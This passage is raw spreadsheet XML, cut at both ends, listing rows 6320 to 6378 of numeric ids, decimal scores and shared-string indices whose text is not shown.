        <v>5319</v>
      </c>
      <c r="C6320">
        <v>5319</v>
      </c>
      <c r="D6320">
        <v>3</v>
      </c>
      <c r="E6320">
        <v>0.99540001153945923</v>
      </c>
      <c r="F6320" t="s">
        <v>10120</v>
      </c>
      <c r="G6320" t="s">
        <v>12500</v>
      </c>
      <c r="H6320" t="s">
        <v>12501</v>
      </c>
    </row>
    <row r="6321" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6321" s="1">
        <v>6319</v>
      </c>
      <c r="B6321">
        <v>5318</v>
      </c>
      <c r="C6321">
        <v>5318</v>
      </c>
      <c r="D6321">
        <v>3</v>
      </c>
      <c r="E6321">
        <v>0.57920002937316895</v>
      </c>
      <c r="F6321" t="s">
        <v>10120</v>
      </c>
      <c r="G6321" t="s">
        <v>12502</v>
      </c>
      <c r="H6321" t="s">
        <v>12503</v>
      </c>
    </row>
    <row r="6322" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6322" s="1">
        <v>6320</v>
      </c>
      <c r="B6322">
        <v>5317</v>
      </c>
      <c r="C6322">
        <v>5317</v>
      </c>
      <c r="D6322">
        <v>3</v>
      </c>
      <c r="E6322">
        <v>0.40549999475479132</v>
      </c>
      <c r="F6322" t="s">
        <v>10120</v>
      </c>
      <c r="G6322" t="s">
        <v>12504</v>
      </c>
      <c r="H6322" t="s">
        <v>12505</v>
      </c>
    </row>
    <row r="6323" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6323" s="1">
        <v>6321</v>
      </c>
      <c r="B6323">
        <v>318</v>
      </c>
      <c r="C6323">
        <v>318</v>
      </c>
      <c r="D6323">
        <v>3</v>
      </c>
      <c r="E6323">
        <v>0.40740001201629639</v>
      </c>
      <c r="F6323" t="s">
        <v>10120</v>
      </c>
      <c r="G6323" t="s">
        <v>12506</v>
      </c>
      <c r="H6323" t="s">
        <v>12507</v>
      </c>
    </row>
    <row r="6324" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6324" s="1">
        <v>6322</v>
      </c>
      <c r="B6324">
        <v>316</v>
      </c>
      <c r="C6324">
        <v>316</v>
      </c>
      <c r="D6324">
        <v>3</v>
      </c>
      <c r="E6324">
        <v>0.49649998545646667</v>
      </c>
      <c r="F6324" t="s">
        <v>10120</v>
      </c>
      <c r="G6324" t="s">
        <v>12508</v>
      </c>
      <c r="H6324" t="s">
        <v>12509</v>
      </c>
    </row>
    <row r="6325" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6325" s="1">
        <v>6323</v>
      </c>
      <c r="B6325">
        <v>4741</v>
      </c>
      <c r="C6325">
        <v>4741</v>
      </c>
      <c r="D6325">
        <v>3</v>
      </c>
      <c r="E6325">
        <v>0.89219999313354492</v>
      </c>
      <c r="F6325" t="s">
        <v>10120</v>
      </c>
      <c r="G6325" t="s">
        <v>12510</v>
      </c>
      <c r="H6325" t="s">
        <v>12511</v>
      </c>
    </row>
    <row r="6326" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6326" s="1">
        <v>6324</v>
      </c>
      <c r="B6326">
        <v>5322</v>
      </c>
      <c r="C6326">
        <v>5322</v>
      </c>
      <c r="D6326">
        <v>3</v>
      </c>
      <c r="E6326">
        <v>0.60280001163482666</v>
      </c>
      <c r="F6326" t="s">
        <v>10120</v>
      </c>
      <c r="G6326" t="s">
        <v>12512</v>
      </c>
      <c r="H6326" t="s">
        <v>12513</v>
      </c>
    </row>
    <row r="6327" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6327" s="1">
        <v>6325</v>
      </c>
      <c r="B6327">
        <v>4609</v>
      </c>
      <c r="C6327">
        <v>4609</v>
      </c>
      <c r="D6327">
        <v>3</v>
      </c>
      <c r="E6327">
        <v>0.39879998564720148</v>
      </c>
      <c r="F6327" t="s">
        <v>10120</v>
      </c>
      <c r="G6327" t="s">
        <v>12514</v>
      </c>
      <c r="H6327" t="s">
        <v>12515</v>
      </c>
    </row>
    <row r="6328" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6328" s="1">
        <v>6326</v>
      </c>
      <c r="B6328">
        <v>364</v>
      </c>
      <c r="C6328">
        <v>364</v>
      </c>
      <c r="D6328">
        <v>3</v>
      </c>
      <c r="E6328">
        <v>0.59820002317428589</v>
      </c>
      <c r="F6328" t="s">
        <v>10120</v>
      </c>
      <c r="G6328" t="s">
        <v>12516</v>
      </c>
      <c r="H6328" t="s">
        <v>12517</v>
      </c>
    </row>
    <row r="6329" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6329" s="1">
        <v>6327</v>
      </c>
      <c r="B6329">
        <v>4595</v>
      </c>
      <c r="C6329">
        <v>4595</v>
      </c>
      <c r="D6329">
        <v>3</v>
      </c>
      <c r="E6329">
        <v>0.62949997186660767</v>
      </c>
      <c r="F6329" t="s">
        <v>10120</v>
      </c>
      <c r="G6329" t="s">
        <v>12518</v>
      </c>
      <c r="H6329" t="s">
        <v>12519</v>
      </c>
    </row>
    <row r="6330" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6330" s="1">
        <v>6328</v>
      </c>
      <c r="B6330">
        <v>4513</v>
      </c>
      <c r="C6330">
        <v>4513</v>
      </c>
      <c r="D6330">
        <v>3</v>
      </c>
      <c r="E6330">
        <v>0.53570002317428589</v>
      </c>
      <c r="F6330" t="s">
        <v>10120</v>
      </c>
      <c r="G6330" t="s">
        <v>12520</v>
      </c>
      <c r="H6330" t="s">
        <v>12521</v>
      </c>
    </row>
    <row r="6331" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6331" s="1">
        <v>6329</v>
      </c>
      <c r="B6331">
        <v>204</v>
      </c>
      <c r="C6331">
        <v>204</v>
      </c>
      <c r="D6331">
        <v>3</v>
      </c>
      <c r="E6331">
        <v>0.53159999847412109</v>
      </c>
      <c r="F6331" t="s">
        <v>10120</v>
      </c>
      <c r="G6331" t="s">
        <v>12522</v>
      </c>
      <c r="H6331" t="s">
        <v>12523</v>
      </c>
    </row>
    <row r="6332" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6332" s="1">
        <v>6330</v>
      </c>
      <c r="B6332">
        <v>4514</v>
      </c>
      <c r="C6332">
        <v>4514</v>
      </c>
      <c r="D6332">
        <v>3</v>
      </c>
      <c r="E6332">
        <v>0.9814000129699707</v>
      </c>
      <c r="F6332" t="s">
        <v>10120</v>
      </c>
      <c r="G6332" t="s">
        <v>12524</v>
      </c>
      <c r="H6332" t="s">
        <v>12525</v>
      </c>
    </row>
    <row r="6333" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6333" s="1">
        <v>6331</v>
      </c>
      <c r="B6333">
        <v>419</v>
      </c>
      <c r="C6333">
        <v>419</v>
      </c>
      <c r="D6333">
        <v>3</v>
      </c>
      <c r="E6333">
        <v>0.2800000011920929</v>
      </c>
      <c r="F6333" t="s">
        <v>10120</v>
      </c>
      <c r="G6333" t="s">
        <v>12526</v>
      </c>
      <c r="H6333" t="s">
        <v>12527</v>
      </c>
    </row>
    <row r="6334" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6334" s="1">
        <v>6332</v>
      </c>
      <c r="B6334">
        <v>53</v>
      </c>
      <c r="C6334">
        <v>53</v>
      </c>
      <c r="D6334">
        <v>3</v>
      </c>
      <c r="E6334">
        <v>0.69340002536773682</v>
      </c>
      <c r="F6334" t="s">
        <v>10120</v>
      </c>
      <c r="G6334" t="s">
        <v>12528</v>
      </c>
      <c r="H6334" t="s">
        <v>12529</v>
      </c>
    </row>
    <row r="6335" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6335" s="1">
        <v>6333</v>
      </c>
      <c r="B6335">
        <v>5398</v>
      </c>
      <c r="C6335">
        <v>5398</v>
      </c>
      <c r="D6335">
        <v>3</v>
      </c>
      <c r="E6335">
        <v>0.85180002450942993</v>
      </c>
      <c r="F6335" t="s">
        <v>10120</v>
      </c>
      <c r="G6335" t="s">
        <v>12530</v>
      </c>
      <c r="H6335" t="s">
        <v>12531</v>
      </c>
    </row>
    <row r="6336" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6336" s="1">
        <v>6334</v>
      </c>
      <c r="B6336">
        <v>4506</v>
      </c>
      <c r="C6336">
        <v>4506</v>
      </c>
      <c r="D6336">
        <v>3</v>
      </c>
      <c r="E6336">
        <v>0.98059999942779541</v>
      </c>
      <c r="F6336" t="s">
        <v>10120</v>
      </c>
      <c r="G6336" t="s">
        <v>12532</v>
      </c>
      <c r="H6336" t="s">
        <v>12533</v>
      </c>
    </row>
    <row r="6337" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6337" s="1">
        <v>6335</v>
      </c>
      <c r="B6337">
        <v>406</v>
      </c>
      <c r="C6337">
        <v>406</v>
      </c>
      <c r="D6337">
        <v>3</v>
      </c>
      <c r="E6337">
        <v>0.51920002698898315</v>
      </c>
      <c r="F6337" t="s">
        <v>10120</v>
      </c>
      <c r="G6337" t="s">
        <v>12534</v>
      </c>
      <c r="H6337" t="s">
        <v>12535</v>
      </c>
    </row>
    <row r="6338" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6338" s="1">
        <v>6336</v>
      </c>
      <c r="B6338">
        <v>4520</v>
      </c>
      <c r="C6338">
        <v>4520</v>
      </c>
      <c r="D6338">
        <v>3</v>
      </c>
      <c r="E6338">
        <v>0.67250001430511475</v>
      </c>
      <c r="F6338" t="s">
        <v>10120</v>
      </c>
      <c r="G6338" t="s">
        <v>12536</v>
      </c>
      <c r="H6338" t="s">
        <v>12537</v>
      </c>
    </row>
    <row r="6339" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6339" s="1">
        <v>6337</v>
      </c>
      <c r="B6339">
        <v>5393</v>
      </c>
      <c r="C6339">
        <v>5393</v>
      </c>
      <c r="D6339">
        <v>3</v>
      </c>
      <c r="E6339">
        <v>0.5656999945640564</v>
      </c>
      <c r="F6339" t="s">
        <v>10120</v>
      </c>
      <c r="G6339" t="s">
        <v>12538</v>
      </c>
      <c r="H6339" t="s">
        <v>12539</v>
      </c>
    </row>
    <row r="6340" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6340" s="1">
        <v>6338</v>
      </c>
      <c r="B6340">
        <v>58</v>
      </c>
      <c r="C6340">
        <v>58</v>
      </c>
      <c r="D6340">
        <v>3</v>
      </c>
      <c r="E6340">
        <v>0.71619999408721924</v>
      </c>
      <c r="F6340" t="s">
        <v>10120</v>
      </c>
      <c r="G6340" t="s">
        <v>12540</v>
      </c>
      <c r="H6340" t="s">
        <v>12541</v>
      </c>
    </row>
    <row r="6341" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6341" s="1">
        <v>6339</v>
      </c>
      <c r="B6341">
        <v>402</v>
      </c>
      <c r="C6341">
        <v>402</v>
      </c>
      <c r="D6341">
        <v>3</v>
      </c>
      <c r="E6341">
        <v>0.61970001459121704</v>
      </c>
      <c r="F6341" t="s">
        <v>10120</v>
      </c>
      <c r="G6341" t="s">
        <v>12542</v>
      </c>
      <c r="H6341" t="s">
        <v>12543</v>
      </c>
    </row>
    <row r="6342" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6342" s="1">
        <v>6340</v>
      </c>
      <c r="B6342">
        <v>4524</v>
      </c>
      <c r="C6342">
        <v>4524</v>
      </c>
      <c r="D6342">
        <v>3</v>
      </c>
      <c r="E6342">
        <v>0.85199999809265137</v>
      </c>
      <c r="F6342" t="s">
        <v>10120</v>
      </c>
      <c r="G6342" t="s">
        <v>12544</v>
      </c>
      <c r="H6342" t="s">
        <v>12545</v>
      </c>
    </row>
    <row r="6343" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6343" s="1">
        <v>6341</v>
      </c>
      <c r="B6343">
        <v>401</v>
      </c>
      <c r="C6343">
        <v>401</v>
      </c>
      <c r="D6343">
        <v>3</v>
      </c>
      <c r="E6343">
        <v>0.9779999852180481</v>
      </c>
      <c r="F6343" t="s">
        <v>10120</v>
      </c>
      <c r="G6343" t="s">
        <v>12546</v>
      </c>
      <c r="H6343" t="s">
        <v>12547</v>
      </c>
    </row>
    <row r="6344" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6344" s="1">
        <v>6342</v>
      </c>
      <c r="B6344">
        <v>54</v>
      </c>
      <c r="C6344">
        <v>54</v>
      </c>
      <c r="D6344">
        <v>3</v>
      </c>
      <c r="E6344">
        <v>0.98830002546310425</v>
      </c>
      <c r="F6344" t="s">
        <v>10120</v>
      </c>
      <c r="G6344" t="s">
        <v>12548</v>
      </c>
      <c r="H6344" t="s">
        <v>12549</v>
      </c>
    </row>
    <row r="6345" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6345" s="1">
        <v>6343</v>
      </c>
      <c r="B6345">
        <v>4505</v>
      </c>
      <c r="C6345">
        <v>4505</v>
      </c>
      <c r="D6345">
        <v>3</v>
      </c>
      <c r="E6345">
        <v>0.58890002965927124</v>
      </c>
      <c r="F6345" t="s">
        <v>10120</v>
      </c>
      <c r="G6345" t="s">
        <v>12550</v>
      </c>
      <c r="H6345" t="s">
        <v>12551</v>
      </c>
    </row>
    <row r="6346" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6346" s="1">
        <v>6344</v>
      </c>
      <c r="B6346">
        <v>52</v>
      </c>
      <c r="C6346">
        <v>52</v>
      </c>
      <c r="D6346">
        <v>3</v>
      </c>
      <c r="E6346">
        <v>0.41679999232292181</v>
      </c>
      <c r="F6346" t="s">
        <v>10120</v>
      </c>
      <c r="G6346" t="s">
        <v>12552</v>
      </c>
      <c r="H6346" t="s">
        <v>12553</v>
      </c>
    </row>
    <row r="6347" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6347" s="1">
        <v>6345</v>
      </c>
      <c r="B6347">
        <v>5400</v>
      </c>
      <c r="C6347">
        <v>5400</v>
      </c>
      <c r="D6347">
        <v>3</v>
      </c>
      <c r="E6347">
        <v>0.87220001220703125</v>
      </c>
      <c r="F6347" t="s">
        <v>10120</v>
      </c>
      <c r="G6347" t="s">
        <v>12554</v>
      </c>
      <c r="H6347" t="s">
        <v>12555</v>
      </c>
    </row>
    <row r="6348" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6348" s="1">
        <v>6346</v>
      </c>
      <c r="B6348">
        <v>5412</v>
      </c>
      <c r="C6348">
        <v>5412</v>
      </c>
      <c r="D6348">
        <v>3</v>
      </c>
      <c r="E6348">
        <v>0.94539999961853027</v>
      </c>
      <c r="F6348" t="s">
        <v>10120</v>
      </c>
      <c r="G6348" t="s">
        <v>12556</v>
      </c>
      <c r="H6348" t="s">
        <v>12557</v>
      </c>
    </row>
    <row r="6349" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6349" s="1">
        <v>6347</v>
      </c>
      <c r="B6349">
        <v>4489</v>
      </c>
      <c r="C6349">
        <v>4489</v>
      </c>
      <c r="D6349">
        <v>3</v>
      </c>
      <c r="E6349">
        <v>0.62709999084472656</v>
      </c>
      <c r="F6349" t="s">
        <v>10120</v>
      </c>
      <c r="G6349" t="s">
        <v>12558</v>
      </c>
      <c r="H6349" t="s">
        <v>12559</v>
      </c>
    </row>
    <row r="6350" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6350" s="1">
        <v>6348</v>
      </c>
      <c r="B6350">
        <v>4494</v>
      </c>
      <c r="C6350">
        <v>4494</v>
      </c>
      <c r="D6350">
        <v>3</v>
      </c>
      <c r="E6350">
        <v>0.55430001020431519</v>
      </c>
      <c r="F6350" t="s">
        <v>10120</v>
      </c>
      <c r="G6350" t="s">
        <v>12560</v>
      </c>
      <c r="H6350" t="s">
        <v>12561</v>
      </c>
    </row>
    <row r="6351" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6351" s="1">
        <v>6349</v>
      </c>
      <c r="B6351">
        <v>430</v>
      </c>
      <c r="C6351">
        <v>430</v>
      </c>
      <c r="D6351">
        <v>3</v>
      </c>
      <c r="E6351">
        <v>0.49329999089241028</v>
      </c>
      <c r="F6351" t="s">
        <v>10120</v>
      </c>
      <c r="G6351" t="s">
        <v>12562</v>
      </c>
      <c r="H6351" t="s">
        <v>12563</v>
      </c>
    </row>
    <row r="6352" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6352" s="1">
        <v>6350</v>
      </c>
      <c r="B6352">
        <v>4495</v>
      </c>
      <c r="C6352">
        <v>4495</v>
      </c>
      <c r="D6352">
        <v>3</v>
      </c>
      <c r="E6352">
        <v>0.94340002536773682</v>
      </c>
      <c r="F6352" t="s">
        <v>10120</v>
      </c>
      <c r="G6352" t="s">
        <v>12564</v>
      </c>
      <c r="H6352" t="s">
        <v>12565</v>
      </c>
    </row>
    <row r="6353" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6353" s="1">
        <v>6351</v>
      </c>
      <c r="B6353">
        <v>5406</v>
      </c>
      <c r="C6353">
        <v>5406</v>
      </c>
      <c r="D6353">
        <v>3</v>
      </c>
      <c r="E6353">
        <v>0.36250001192092901</v>
      </c>
      <c r="F6353" t="s">
        <v>10120</v>
      </c>
      <c r="G6353" t="s">
        <v>12566</v>
      </c>
      <c r="H6353" t="s">
        <v>12567</v>
      </c>
    </row>
    <row r="6354" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6354" s="1">
        <v>6352</v>
      </c>
      <c r="B6354">
        <v>4497</v>
      </c>
      <c r="C6354">
        <v>4497</v>
      </c>
      <c r="D6354">
        <v>3</v>
      </c>
      <c r="E6354">
        <v>0.69340002536773682</v>
      </c>
      <c r="F6354" t="s">
        <v>10120</v>
      </c>
      <c r="G6354" t="s">
        <v>12568</v>
      </c>
      <c r="H6354" t="s">
        <v>12569</v>
      </c>
    </row>
    <row r="6355" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6355" s="1">
        <v>6353</v>
      </c>
      <c r="B6355">
        <v>4498</v>
      </c>
      <c r="C6355">
        <v>4498</v>
      </c>
      <c r="D6355">
        <v>3</v>
      </c>
      <c r="E6355">
        <v>0.79839998483657837</v>
      </c>
      <c r="F6355" t="s">
        <v>10120</v>
      </c>
      <c r="G6355" t="s">
        <v>12570</v>
      </c>
      <c r="H6355" t="s">
        <v>12571</v>
      </c>
    </row>
    <row r="6356" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6356" s="1">
        <v>6354</v>
      </c>
      <c r="B6356">
        <v>427</v>
      </c>
      <c r="C6356">
        <v>427</v>
      </c>
      <c r="D6356">
        <v>3</v>
      </c>
      <c r="E6356">
        <v>0.98439997434616089</v>
      </c>
      <c r="F6356" t="s">
        <v>10120</v>
      </c>
      <c r="G6356" t="s">
        <v>12572</v>
      </c>
      <c r="H6356" t="s">
        <v>12573</v>
      </c>
    </row>
    <row r="6357" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6357" s="1">
        <v>6355</v>
      </c>
      <c r="B6357">
        <v>5405</v>
      </c>
      <c r="C6357">
        <v>5405</v>
      </c>
      <c r="D6357">
        <v>3</v>
      </c>
      <c r="E6357">
        <v>0.53469997644424438</v>
      </c>
      <c r="F6357" t="s">
        <v>10120</v>
      </c>
      <c r="G6357" t="s">
        <v>12574</v>
      </c>
      <c r="H6357" t="s">
        <v>12575</v>
      </c>
    </row>
    <row r="6358" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6358" s="1">
        <v>6356</v>
      </c>
      <c r="B6358">
        <v>50</v>
      </c>
      <c r="C6358">
        <v>50</v>
      </c>
      <c r="D6358">
        <v>3</v>
      </c>
      <c r="E6358">
        <v>0.99290001392364502</v>
      </c>
      <c r="F6358" t="s">
        <v>10120</v>
      </c>
      <c r="G6358" t="s">
        <v>12576</v>
      </c>
      <c r="H6358" t="s">
        <v>12577</v>
      </c>
    </row>
    <row r="6359" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6359" s="1">
        <v>6357</v>
      </c>
      <c r="B6359">
        <v>4499</v>
      </c>
      <c r="C6359">
        <v>4499</v>
      </c>
      <c r="D6359">
        <v>3</v>
      </c>
      <c r="E6359">
        <v>0.86339998245239258</v>
      </c>
      <c r="F6359" t="s">
        <v>10120</v>
      </c>
      <c r="G6359" t="s">
        <v>12578</v>
      </c>
      <c r="H6359" t="s">
        <v>12579</v>
      </c>
    </row>
    <row r="6360" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6360" s="1">
        <v>6358</v>
      </c>
      <c r="B6360">
        <v>426</v>
      </c>
      <c r="C6360">
        <v>426</v>
      </c>
      <c r="D6360">
        <v>3</v>
      </c>
      <c r="E6360">
        <v>0.50040000677108765</v>
      </c>
      <c r="F6360" t="s">
        <v>10120</v>
      </c>
      <c r="G6360" t="s">
        <v>12580</v>
      </c>
      <c r="H6360" t="s">
        <v>12581</v>
      </c>
    </row>
    <row r="6361" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6361" s="1">
        <v>6359</v>
      </c>
      <c r="B6361">
        <v>424</v>
      </c>
      <c r="C6361">
        <v>424</v>
      </c>
      <c r="D6361">
        <v>3</v>
      </c>
      <c r="E6361">
        <v>0.84060001373291016</v>
      </c>
      <c r="F6361" t="s">
        <v>10120</v>
      </c>
      <c r="G6361" t="s">
        <v>12582</v>
      </c>
      <c r="H6361" t="s">
        <v>11615</v>
      </c>
    </row>
    <row r="6362" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6362" s="1">
        <v>6360</v>
      </c>
      <c r="B6362">
        <v>4503</v>
      </c>
      <c r="C6362">
        <v>4503</v>
      </c>
      <c r="D6362">
        <v>3</v>
      </c>
      <c r="E6362">
        <v>0.58939999341964722</v>
      </c>
      <c r="F6362" t="s">
        <v>10120</v>
      </c>
      <c r="G6362" t="s">
        <v>12583</v>
      </c>
      <c r="H6362" t="s">
        <v>12584</v>
      </c>
    </row>
    <row r="6363" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6363" s="1">
        <v>6361</v>
      </c>
      <c r="B6363">
        <v>63</v>
      </c>
      <c r="C6363">
        <v>63</v>
      </c>
      <c r="D6363">
        <v>3</v>
      </c>
      <c r="E6363">
        <v>0.56950002908706665</v>
      </c>
      <c r="F6363" t="s">
        <v>10120</v>
      </c>
      <c r="G6363" t="s">
        <v>12585</v>
      </c>
      <c r="H6363" t="s">
        <v>12586</v>
      </c>
    </row>
    <row r="6364" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6364" s="1">
        <v>6362</v>
      </c>
      <c r="B6364">
        <v>66</v>
      </c>
      <c r="C6364">
        <v>66</v>
      </c>
      <c r="D6364">
        <v>3</v>
      </c>
      <c r="E6364">
        <v>0.83730000257492065</v>
      </c>
      <c r="F6364" t="s">
        <v>10120</v>
      </c>
      <c r="G6364" t="s">
        <v>12587</v>
      </c>
      <c r="H6364" t="s">
        <v>12588</v>
      </c>
    </row>
    <row r="6365" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6365" s="1">
        <v>6363</v>
      </c>
      <c r="B6365">
        <v>399</v>
      </c>
      <c r="C6365">
        <v>399</v>
      </c>
      <c r="D6365">
        <v>3</v>
      </c>
      <c r="E6365">
        <v>0.98470002412796021</v>
      </c>
      <c r="F6365" t="s">
        <v>10120</v>
      </c>
      <c r="G6365" t="s">
        <v>12589</v>
      </c>
      <c r="H6365" t="s">
        <v>12590</v>
      </c>
    </row>
    <row r="6366" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6366" s="1">
        <v>6364</v>
      </c>
      <c r="B6366">
        <v>4529</v>
      </c>
      <c r="C6366">
        <v>4529</v>
      </c>
      <c r="D6366">
        <v>3</v>
      </c>
      <c r="E6366">
        <v>0.78149998188018799</v>
      </c>
      <c r="F6366" t="s">
        <v>10120</v>
      </c>
      <c r="G6366" t="s">
        <v>12591</v>
      </c>
      <c r="H6366" t="s">
        <v>12592</v>
      </c>
    </row>
    <row r="6367" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6367" s="1">
        <v>6365</v>
      </c>
      <c r="B6367">
        <v>4570</v>
      </c>
      <c r="C6367">
        <v>4570</v>
      </c>
      <c r="D6367">
        <v>3</v>
      </c>
      <c r="E6367">
        <v>0.53219997882843018</v>
      </c>
      <c r="F6367" t="s">
        <v>10120</v>
      </c>
      <c r="G6367" t="s">
        <v>12593</v>
      </c>
      <c r="H6367" t="s">
        <v>12594</v>
      </c>
    </row>
    <row r="6368" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6368" s="1">
        <v>6366</v>
      </c>
      <c r="B6368">
        <v>4574</v>
      </c>
      <c r="C6368">
        <v>4574</v>
      </c>
      <c r="D6368">
        <v>3</v>
      </c>
      <c r="E6368">
        <v>0.99930000305175781</v>
      </c>
      <c r="F6368" t="s">
        <v>10120</v>
      </c>
      <c r="G6368" t="s">
        <v>12595</v>
      </c>
      <c r="H6368" t="s">
        <v>12596</v>
      </c>
    </row>
    <row r="6369" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6369" s="1">
        <v>6367</v>
      </c>
      <c r="B6369">
        <v>4575</v>
      </c>
      <c r="C6369">
        <v>4575</v>
      </c>
      <c r="D6369">
        <v>3</v>
      </c>
      <c r="E6369">
        <v>0.84530001878738403</v>
      </c>
      <c r="F6369" t="s">
        <v>10120</v>
      </c>
      <c r="G6369" t="s">
        <v>12597</v>
      </c>
      <c r="H6369" t="s">
        <v>12598</v>
      </c>
    </row>
    <row r="6370" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6370" s="1">
        <v>6368</v>
      </c>
      <c r="B6370">
        <v>4577</v>
      </c>
      <c r="C6370">
        <v>4577</v>
      </c>
      <c r="D6370">
        <v>3</v>
      </c>
      <c r="E6370">
        <v>0.99809998273849487</v>
      </c>
      <c r="F6370" t="s">
        <v>10120</v>
      </c>
      <c r="G6370" t="s">
        <v>12599</v>
      </c>
      <c r="H6370" t="s">
        <v>12600</v>
      </c>
    </row>
    <row r="6371" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6371" s="1">
        <v>6369</v>
      </c>
      <c r="B6371">
        <v>380</v>
      </c>
      <c r="C6371">
        <v>380</v>
      </c>
      <c r="D6371">
        <v>3</v>
      </c>
      <c r="E6371">
        <v>0.60809999704360962</v>
      </c>
      <c r="F6371" t="s">
        <v>10120</v>
      </c>
      <c r="G6371" t="s">
        <v>12601</v>
      </c>
      <c r="H6371" t="s">
        <v>12602</v>
      </c>
    </row>
    <row r="6372" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6372" s="1">
        <v>6370</v>
      </c>
      <c r="B6372">
        <v>4578</v>
      </c>
      <c r="C6372">
        <v>4578</v>
      </c>
      <c r="D6372">
        <v>3</v>
      </c>
      <c r="E6372">
        <v>0.99930000305175781</v>
      </c>
      <c r="F6372" t="s">
        <v>10120</v>
      </c>
      <c r="G6372" t="s">
        <v>12603</v>
      </c>
      <c r="H6372" t="s">
        <v>12604</v>
      </c>
    </row>
    <row r="6373" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6373" s="1">
        <v>6371</v>
      </c>
      <c r="B6373">
        <v>4579</v>
      </c>
      <c r="C6373">
        <v>4579</v>
      </c>
      <c r="D6373">
        <v>3</v>
      </c>
      <c r="E6373">
        <v>0.87330001592636108</v>
      </c>
      <c r="F6373" t="s">
        <v>10120</v>
      </c>
      <c r="G6373" t="s">
        <v>12605</v>
      </c>
      <c r="H6373" t="s">
        <v>12606</v>
      </c>
    </row>
    <row r="6374" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6374" s="1">
        <v>6372</v>
      </c>
      <c r="B6374">
        <v>4580</v>
      </c>
      <c r="C6374">
        <v>4580</v>
      </c>
      <c r="D6374">
        <v>3</v>
      </c>
      <c r="E6374">
        <v>0.99550002813339233</v>
      </c>
      <c r="F6374" t="s">
        <v>10120</v>
      </c>
      <c r="G6374" t="s">
        <v>12607</v>
      </c>
      <c r="H6374" t="s">
        <v>12608</v>
      </c>
    </row>
    <row r="6375" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6375" s="1">
        <v>6373</v>
      </c>
      <c r="B6375">
        <v>5381</v>
      </c>
      <c r="C6375">
        <v>5381</v>
      </c>
      <c r="D6375">
        <v>3</v>
      </c>
      <c r="E6375">
        <v>0.52029997110366821</v>
      </c>
      <c r="F6375" t="s">
        <v>10120</v>
      </c>
      <c r="G6375" t="s">
        <v>12609</v>
      </c>
      <c r="H6375" t="s">
        <v>12610</v>
      </c>
    </row>
    <row r="6376" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6376" s="1">
        <v>6374</v>
      </c>
      <c r="B6376">
        <v>5373</v>
      </c>
      <c r="C6376">
        <v>5373</v>
      </c>
      <c r="D6376">
        <v>3</v>
      </c>
      <c r="E6376">
        <v>0.45309999585151672</v>
      </c>
      <c r="F6376" t="s">
        <v>10120</v>
      </c>
      <c r="G6376" t="s">
        <v>12611</v>
      </c>
      <c r="H6376" t="s">
        <v>12612</v>
      </c>
    </row>
    <row r="6377" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6377" s="1">
        <v>6375</v>
      </c>
      <c r="B6377">
        <v>371</v>
      </c>
      <c r="C6377">
        <v>371</v>
      </c>
      <c r="D6377">
        <v>3</v>
      </c>
      <c r="E6377">
        <v>0.49759998917579651</v>
      </c>
      <c r="F6377" t="s">
        <v>10120</v>
      </c>
      <c r="G6377" t="s">
        <v>12613</v>
      </c>
      <c r="H6377" t="s">
        <v>12614</v>
      </c>
    </row>
    <row r="6378" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6378" s="1">
        <v>6376</v>
      </c>
      <c r="B6378">
        <v>4583</v>
      </c>
      <c r="C6378">
        <v>4583</v>
      </c>
      <c r="D6378">
        <v>3</v>
      </c>
      <c r="E6378">
        <v>0.67849999666213989</v>
      </c>
      <c r="F6378" t="s">
        <v>10120</v>
      </c>
      <c r="G6378" t="s">
